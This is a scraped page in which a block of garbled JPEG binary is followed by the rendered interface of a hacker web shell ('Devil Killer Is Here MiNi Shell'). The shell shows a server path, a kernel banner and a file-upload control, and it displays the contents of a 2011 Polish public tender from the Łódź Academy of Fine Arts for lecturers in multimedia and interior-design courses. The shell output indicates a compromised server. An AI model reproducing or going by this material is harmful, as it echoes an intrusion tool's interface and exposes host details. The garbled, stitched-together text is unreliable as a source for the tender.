JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/154325-N-2011.html

<p class="kh_header"><b>Łódź: Przetarg nieograniczony na:
Przeprowadzenie wykładów i ćwiczeń w ramach projektu pn. Akademia multimediów i wystawiennictwa w zakresie:
I.	Kursu Multimedia Animacja 3D i Efekty Specjalne na potrzeby gier komputerowych i filmu
II.	Kursu Wystawiennictwo Projektowanie przestrzeni wnętrz w obiektach hotelarsko-turystycznych
Projekt realizowany jest dzięki dofinansowaniu ze środków Unii Europejskiej, w ramach Programu Operacyjnego Kapitał Ludzki , Priorytet VIII Regionalne kadry gospodarki,
Poddziałanie 8.1.1 Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw.</b><br>
<b>Numer ogłoszenia: 154325 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi , ul. Wojska Polskiego 121, 91-726 Łódź, woj. łódzkie, tel. 042 2547408, centrala 2547598, faks 042 2547418.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na:
Przeprowadzenie wykładów i ćwiczeń w ramach projektu pn. Akademia multimediów i wystawiennictwa w zakresie:
I.	Kursu Multimedia Animacja 3D i Efekty Specjalne na potrzeby gier komputerowych i filmu
II.	Kursu Wystawiennictwo Projektowanie przestrzeni wnętrz w obiektach hotelarsko-turystycznych
Projekt realizowany jest dzięki dofinansowaniu ze środków Unii Europejskiej, w ramach Programu Operacyjnego Kapitał Ludzki , Priorytet VIII Regionalne kadry gospodarki,
Poddziałanie 8.1.1 Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu:
I.   Kursu Multimedia Animacja 3D i Efekty Specjalne na potrzeby gier komputerowych i filmu.
Cz. 1	Przeprowadzenie wykładów i ćwiczeń z zakresu multimediów i postprodukcyjnych efektów specjalnych grafiki i animacji 3D,	1 wykładowca z tytułem doktora, 210 godzin dydaktycznych
Cz. 2	Przeprowadzenie wykładów i ćwiczeń z zakresu multimediów i postprodukcyjnych efektów specjalnych grafiki i animacji 3D,	1 wykładowca ze stopniem magistra,	210 godzin dydaktycznych
Cz. 3	Przeprowadzenie ćwiczeń z zakresu projektowania interaktywnej prezentacji i wydawnictw multimedialnych oraz cyfrowej obróbki obrazu,	1 wykładowca 
ze stopniem magistra,	90 godzin dydaktycznych
Cz. 4	Przeprowadzenie  ćwiczeń z zakresu projektowania interaktywnej prezentacji i wydawnictw multimedialnych oraz cyfrowej obróbki obrazu,	1 wykładowca 
ze stopniem magistra, 90 godzin dydaktycznych

II.  Kursu Wystawiennictwa Projektowanie  przestrzeni wnętrz w obiektach hotelarsko-turystycznych
Cz. 1	Przeprowadzenie wykładów i ćwiczeń z zakresu komunikacji interpersonalnej i psychologii środowiskowej,1 wykładowca z tytułem profesora zwyczajnego sztuk plastycznych, 35 godzin dydaktycznych
Cz. 2	Przeprowadzenie wykładów i ćwiczeń z zakresu rekreacji i zagospodarowania czasu wolnego, 1 wykładowca z tytułem profesora nadzwyczajnego uczelni artystycznej, 35godzin dydaktycznych
Cz. 3	Przeprowadzenie wykładów i ćwiczeń z zakresu kompozycji, malarstwa, rysunku studyjnego i architektonicznego,1 wykładowca z tytułem profesora nadzwyczajnego uczelni artystycznej, 34 godzin dydaktycznych
Cz. 4	Przeprowadzenie wykładów i ćwiczeń z zakresu projektowania węzłów higieniczno-sanitarnych oraz wyposażenia sal wielofunkcyjnych,1 wykładowca 
z tytułem profesora nadzwyczajnego uczelni artystycznej, 34 godzin dydaktycznych
Cz. 5	Przeprowadzenie wykładów i ćwiczeń z zakresu projektowania i aranżacji przestrzeni w obiektach turystycznych i hotelarskich,	1 wykładowca 
z tytułem doktora habilitowanego, 69 godzin dydaktycznych
Cz. 6	Przeprowadzenie wykładów i ćwiczeń z zakresu obsługi programów do projektowania architektury,1 wykładowca z tytułem doktora nauk technicznych	69 godzin dydaktycznych
Cz. 7	Przeprowadzenie wykładów i ćwiczeń z zakresu przygotowania dokumentacji technicznej oraz koncepcji projektowej aranżacji, 1 wykładowca 
z tytułem doktora,	69 godzin dydaktycznych
Cz. 8	Przeprowadzenie wykładów i ćwiczeń z zakresu projektowania węzła gastronomicznego oraz oświetlenia,	1 wykładowca z tytułem doktora, 	69 godzin dydaktycznych
Cz. 9	Przeprowadzenie ćwiczeń z zakresu rozpoczęcia i prowadzenia działalności gospodarczej,	1 wykładowca ze stopniem magistra	24 godzin dydaktycznych
Cz.10	Przeprowadzenie ćwiczeń z zakresu marketingu usług turystycznych, 1 wykładowca ze stopniem magistra,	24 godzin dydaktycznych

Termin realizacji
Planowany termin realizacji przedmiotu zamówienia: od 25 czerwca 2011r. do 31 grudnia 2011r. Wykłady-ćwiczenia w ramach poszczególnych kursów odbywać się będą równolegle tj. w tych samych dniach i godzinach (w soboty i niedziele, rozpoczęcie zajęć w godzinach porannych). Plan zajęć zostanie przygotowany i przedstawiony Wykonawcy przed rozpoczęciem realizacji przedmiotu zamówienia. 

Miejsce 
Wykłady i ćwiczenie odbywać się będą w siedzibie Akademii Sztuk Pięknych im. Wł.Strzemińskiego w Łodzi przy ul. Wojska Polskiego 121 w najnowocześniejszym w woj. Łódzkim centrum multimedialnym CYCERON.

Grupa docelowa 
Kurs Multimedia Animacja 3D i Efekty Specjalne na potrzeby gier komputerowych i filmu
Wystawiennictwa Projektowanie przestrzeni wnętrz w obiektach hotelarsko-turystycznych w ramach projektu: Akademia multimediów i wystawiennictwa. Kurs zostanie przeprowadzony dla 64 pracujących osób bez względu na charakter umowy o pracę (z wyjątkiem osób fizycznych prowadzących działalność gospodarczą) posiadających miejsce zamieszkania na terenie woj. Łódzkiego, które poza godzinami pracy są zainteresowane nabyciem nowych, uzupełnieniem lub podwyższeniem kwalifikacji w zakresie multimediów oraz aranżacji przestrzeni we wnętrzach turystyczno-hotelarskich.


Opis Kursów
Kurs Multimedia Animacja 3D i Efekty Specjalne na potrzeby gier komputerowych i filmu odbywać się będzie w podziale na 4 grupy po 16 osób w tym 2 grupy na  poziomie podstawowym i 2 grupy na poziomie zaawansowanym. Celem kursu jest przygotowanie słuchaczy do pracy animatora 3D oraz specjalisty w dziedzinie projektowania i tworzenia efektów specjalnych w produkcjach reklamowych i filmowych. Poznania zasad modelowania i animowania w środowiskach aplikacji komputerowych tworzących grafikę i animację 3D, zapoznanie słuchaczy z technikami tworzenia hiperrealistycznych wizualizacji oraz scenografii cyfrowych.

Kurs Wystawiennictwo Projektowanie przestrzeni wnętrz w obiektach hotelarski-turystycznych odbywać się będzie w podziale na 4 grupy po 16 osób w tym 2 grupy na  poziomie podstawowym i 2 grupy na poziomie zaawansowanym. Celem kursu jest przygotowanie słuchaczy do pracy przy organizacji przestrzeni i urządzeniu wnętrz w obiektach turystycznych i hotelarskich, poznanie zasad projektowania wnętrz użyteczności publicznej mającej na celu zadania perswazyjne. Zrozumienie metod, technik aranżacji przestrzeni komercyjnych oraz reguł pozycjonowania. Kurs obejmuje obsługę programu ArchiCAD, podstawy oświetlenia używanego w aranżowaniu wnętrz, zasady komunikacji interpersonalnej, rysunek.


Zaoferowana przez Wykonawcę cena jest ceną za 1 godzinę dydaktyczną (45 min).
W cenie oferty Wykonawca uwzględnia wszelkie koszty związane z przeprowadzeniem wykładu - ćwiczeń, w szczególności koszty opracowania materiałów szkoleniowych, koszty podróży oraz hotelu Wykładowcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wprowadza obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą się zrealizowaniem, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, następujących usług:
I.   Kursu Multimedia Animacja 3D i Efekty Specjalne na potrzeby gier komputerowych i filmu.
Część 1 Przeprowadzenie wykładów i ćwiczeń z zakresu multimediów i postprodukcyjnych efektów specjalnych grafiki i animacji 3D
 - minimum dwa zrealizowane opracowania programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów,
- minimum dwie zrealizowane publikacje bądź będące w fazie  przygotowania ( umowa z wydawnictwem) publikacje oraz opracowania monograficzne (książki) z zakresu grafiki 3D, animacji  komputerowej, multimediów, motion design, postprodukcyjnych efektów specjalnych
- minimum dwa zrealizowane komercyjne projekty multimedialne (filmy reklamowe z zastosowaniem animacji 3D, prezentacje multimedialne, wizualizacje komputerowe, lokacje gier komputerowych),
Część 2 Przeprowadzenie wykładów i ćwiczeń z zakresu multimediów i postprodukcyjnych efektów specjalnych grafiki i animacji 3D.
- minimum dwa zrealizowane opracowania programów nauczania i szkoleń z zakresu grafiki i animacji 3D, VFX, multimediów,
- minimum dwie zrealizowane publikacje bądź będące w fazie  przygotowania ( umowa z wydawnictwem) publikacje oraz opracowania monograficzne (książki) z zakresu grafiki 3D, animacji  komputerowej, multimediów, motion design, postprodukcyjnych efektów specjalnych
- minimum dwa zrealizowane komercyjne projekty multimedialne (filmy reklamowe z zastosowaniem animacji 3D, prezentacje multimedialne, wizualizacje komputerowe, lokacje gier komputerowych),
Część 3 Przeprowadzenie ćwiczeń z zakresu projektowania interaktywnej prezentacji i wydawnictw multimedialnych oraz cyfrowej obróbki obrazu
- minimum 3 realizacje internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza) 
Część 4 Przeprowadzenie ćwiczeń z zakresu projektowania interaktywnej prezentacji i wydawnictw multimedialnych oraz cyfrowej obróbki obrazu
- minimum 3 realizacje internetowych i graficznych projektów reklamowych (witryny internetowe, banery, grafika wydawnicza)
II.  Kursu Wystawiennictwa Projektowanie  przestrzeni wnętrz w obiektach hotelarsko-turystycznych
Część 1 przeprowadzenie wykładów i ćwiczeń z zakresu komunikacji interpersonalnej i psychologii środowiskowej
- dorobek projektowy obejmujący min. 3 projekty w zakresie wnętrz mieszkalnych, zabytkowych.
Część 2  przeprowadzenie wykładów i ćwiczeń z zakresu rekreacji i zagospodarowania czasu wolnego
- dorobek projektowy obejmujący min. 3 projekty w zakresie wzornictwa użytkowego
Część 3 przeprowadzenie wykładów i ćwiczeń z zakresu kompozycji, malarstwa, rysunku studyjnego i architektonicznego 
- dorobek artystyczny obejmujący min. 2 wystawy w zakresie kompozycji, malarstwa, rysunku, rzeźby
Część 4 przeprowadzenie wykładów i ćwiczeń z zakresu projektowania węzłów higieniczno-sanitarnych oraz wyposażenia sal wielofunkcyjnych
- dorobek projektowy obejmujący min. 3 projekty zrealizowane w zakresie obiektów hotelowych, turystyczny i rozrywkowych.
Część 5 przeprowadzenie wykładów i ćwiczeń z zakresu projektowania i aranżacji przestrzeni w obiektach turystycznych i hotelarskich
- dorobek projektowy obejmujący min. 3 projekty zrealizowane w zakresie w zakresie wzornictwa przemysłowego oraz projektów zastosowanych do użyteczności publicznej.
Część 6 przeprowadzenie wykładów i ćwiczeń z zakresu obsługi programów do projektowania architektury
- dorobek projektowy obejmujący min. 3 projekty zrealizowane w zakresie projektów budynków użyteczności publicznej, budynków mieszkalnych i wnętrz.
Część 7  przeprowadzenie wykładów i ćwiczeń z zakresu przygotowania dokumentacji technicznej oraz koncepcji projektowej aranżacji
- dorobek projektowy obejmujący min. 3 projekty zrealizowane w zakresie projektów budynków użyteczności publicznej, budynków mieszkalnych i wnętrz.
Część 8 przeprowadzenie wykładów i ćwiczeń z zakresu projektowania węzła gastronomicznego oraz oświetlenia 
- dorobek projektowy obejmujący min. 3 projekty zrealizowane w zakresie obiektów restauracyjnych w tym ogródków restauracyjnych, kawiarni, klubów.
Część 9 przeprowadzenie ćwiczeń z zakresu rozpoczęcia i prowadzenia działalności gospodarczej
- przeprowadzenie min. 3 zajęć dydaktycznych w formie ćwiczeń, laboratorium, konwersatorium w szkolnictwie wyższym. 
Część 10 przeprowadzenie ćwiczeń z zakresu marketingu usług turystycznych
- przeprowadzenie min. 3 zajęć dydaktycznych w formie ćwiczeń,  laboratorium, konwersatorium w szkolnictwie wyższym 
Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 6 do siwz. 
Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia   - nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać:
I.   Kursu Multimedia Animacja 3D i Efekty Specjalne na potrzeby gier komputerowych i filmu
Część 1 Przeprowadzenie wykładów i ćwiczeń z zakresu multimediów i postprodukcyjnych efektów specjalnych grafiki i animacji 3D
- tytuł doktora
- minimum trzy letnie doświadczenie w pracy dydaktycznej w prowadzeniu wykładów i ćwiczeń w szkolnictwie wyższym oraz
- minimum trzy letnie doświadczenie w prowadzeniu zajęć dydaktycznych z zakresu: podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, postprodukcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy ,filmu i gier komputerowych, 
Część 2 Przeprowadzenie wykładów i ćwiczeń z zakresu multimediów i postprodukcyjnych efektów specjalnych grafiki i animacji 3D
- tytuł magistra
- minimum trzy letnie doświadczenie w pracy dydaktycznej w prowadzeniu wykładów i ćwiczeń w szkolnictwie wyższym oraz
- minimum trzy letnie doświadczenie w prowadzeniu zajęć dydaktycznych z zakresu: podstaw multimediów, animacji komputerowej, realizacji multimedialnych na potrzeby reklamy i filmu, grafiki i animacji 3D, postprodukcyjnych technologii tworzenia efektów specjalnych na potrzeby reklamy ,filmu i gier komputerowych, 
Część 3 Przeprowadzenie ćwiczeń z zakresu projektowania interaktywnej prezentacji i wydawnictw multimedialnych oraz cyfrowej obróbki obrazu
- tytuł magistra
Część 4 Przeprowadzenie ćwiczeń z zakresu projektowania interaktywnej prezentacji i wydawnictw multimedialnych oraz cyfrowej obróbki obrazu
- tytuł magistra
 
II.  Kursu Wystawiennictwa Projektowanie  przestrzeni wnętrz w obiektach hotelarsko-turystycznych
Część 1 przeprowadzenie wykładów i ćwiczeń z zakresu komunikacji interpersonalnej i psychologii środowiskowej
- tytuł profesora sztuk plastycznych
- minimum 20-letnie doświadczenie w pracy dydaktycznej,
- minimum 2-letnie doświadczenie w prowadzeniu zajęć z rozwoju umiejętności komunikacji interpersonalnych, technik aktywnego słuchania, parafrazowania, metod zwalczania negatywnego stresu, technik prezentacyjnych.
Część 2  przeprowadzenie wykładów i ćwiczeń z zakresu rekreacji i zagospodarowania czasu wolnego
- tytuł doktora habilitowanego sztuk plastycznych w zakresie dyscypliny artystyczne sztuki użytkowe
- minimum 10-cio letnie doświadczenie w prowadzeniu zajęć dydaktycznych min. z rekreacji i zagospodarowania czasu wolnego, wzornictwa użytkowego, wyposażenia wnętrz.
Część 3 przeprowadzenie wykładów i ćwiczeń z zakresu kompozycji, malarstwa, rysunku studyjnego i architektonicznego 
- minimum kwalifikacje II stopnia w dziedzinie sztuki plastyczne, w dyscyplinie artystycznej malarstwo lub tytuł dr habilitowanego  w zakresie sztuk plastycznych,
- minimum 10-cio letnie doświadczenie w prowadzeniu zajęć dydaktycznych min z malarstwa, rysunku studyjnego i architektonicznego, zasad rysunku perspektywicznego.
Część 4 przeprowadzenie wykładów i ćwiczeń z zakresu projektowania węzłów higieniczno-sanitarnych oraz wyposażenia sal wielofunkcyjnych
- tytuł doktora habilitowanego w zakresie sztuk plastycznych w dyscyplinie artystycznej sztuki użytkowej,
- minimum 15 letnie doświadczenie w prowadzeniu zajęć dydaktycznych min. z projektowania obiektów hotelowych, turystycznych i rozrywkowych.

Część 5 przeprowadzenie wykładów i ćwiczeń z zakresu projektowania i aranżacji przestrzeni w obiektach turystycznych i hotelarskich
- tytuł minimum kwalifikacje II stopnia sztuki plastyczne w zakresie dyscypliny artystyczne wzornictwo lub tytuł dr habilitowanego  w zakresie sztuk plastycznych w dyscyplinie artystycznej sztuki użytkowej
- minimum 20-letnie doświadczenie w pracy dydaktycznej min. z projektowania i aranżacji przestrzeni w obiektach turystycznych i hotelarskich
Część 6 przeprowadzenie wykładów i ćwiczeń z zakresu obsługi programów do projektowania architektury
- minimum stopień doktora nauk technicznych,
- minimum 10-cio letnie doświadczenie w prowadzeniu zajęć dydaktycznych min. z obsługi i wykorzystania programów do projektowania architektury

Część 7  przeprowadzenie wykładów i ćwiczeń z zakresu przygotowania dokumentacji technicznej oraz koncepcji projektowej aranżacji
- minimum tytuł doktora,
- minimum 10-cio letnie doświadczenie w prowadzeniu zajęć dydaktycznych min. z ergonomii do projektowania architektury wnętrz, przygotowania dokumentacji technicznej oraz koncepcji projektowej aranżacji
Część 8 przeprowadzenie wykładów i ćwiczeń z zakresu projektowania węzła gastronomicznego oraz oświetlenia
- minimum tytuł doktora
Część 9 przeprowadzenie ćwiczeń z zakresu rozpoczęcia i prowadzenia działalności gospodarczej
- tytuł magistra
Część 10 przeprowadzenie ćwiczeń z zakresu marketingu usług turystycznych
- tytuł magistra
Na potwierdzenie spełnienia powyższego warunku Wykonawca zobowiązany jest złożyć oświadczenie o spełnieniu powyższego warunku - według załącznika nr 7 do siwz. 

Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku przez wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie w sprawie zamówienia publicznego, w toku jej realizacji:
1.	Wszelkie zmiany umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa.
2.	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy wskutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu. 
3.	Zmiana podyktowana jest okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy, tj.: odwołanie wykładów-ćwiczeń, choroba Wykonawcy uniemożliwiająca osobiste przeprowadzenie wykładów-ćwiczeń.
4.	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu systemowego lub wytycznych dotyczących realizacji zamówienia.
5.	Wydłużenie terminu płatności za realizację zadania do czasu otrzymania środków z Instytucji Zarządzającej. W przypadku nieotrzymania środków z Instytucji Zarządzającej, Zamawiający w terminie 3 dni przed upływem terminu płatności poinformuje Wykonawcę o możliwości przedłużenia terminu płatności. Maksymalny termin przedłużenia terminu płatności to 3 miesiące licząc od określonej daty płatności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
